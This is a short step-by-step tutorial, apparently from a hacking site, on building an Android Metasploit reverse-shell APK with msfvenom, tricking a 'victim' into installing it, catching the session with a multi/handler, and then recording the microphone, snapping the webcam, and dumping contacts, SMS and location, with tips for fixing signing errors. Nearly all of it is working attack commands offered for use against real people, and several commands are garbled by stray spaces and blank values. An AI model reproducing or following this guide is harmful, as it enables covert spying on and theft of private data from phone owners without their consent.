Hack any phone (STEPS by STEPS)


1. Fire up and open command terminal.

2. Set payload and create custom windows executable

root @ kali: - # msfvenom -p android / meterpreter / reverse_tcp LHOST = LPORT = 4444 R> andro.apk
(To know your LHOST, open new terminal and type ifconfig) your

The apk file is saved in the home folder

Note: Do not add any stray space characters anywhere as the command as is (after changing the LHOST and LPORT as needed).

3. Transfer / mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows: Command:
root @ kali: - # msfconsole

5. Now it's time to open and setup multi-handler Follows the steps:
msf>  use multi / handler
msf exploit (handler)>  set payload android / meterpreter / reverse_tcp
msf exploit (handler)>  set LHOST
msf exploit (handler)>  set LPORT 4444
msf exploit (handler)>  exploit
        Payload handler is being started ........

6. When the victims click on the app (installed as MAIN ACTIVITY in the menu) in their phone, meterpreter session will be established.

7. Try the following exploit commands:
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
**************************************************************************************************** ********************************************
Error fixing (incase you get PARSE ERROR)

Two methods:

1) Type command " d2j-apk-sign andro.apk

 2) To fix this error download signapk -  Click here to download

Steps to follow

  1. Open Signapk folder then open cmd
  2. Copy the andro.apk (the app you made) Signapk folder.
  3. Type java - "jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk" in cmd (not double quotes).
  4. copy it in your phone and install it
Hope this works ... :)


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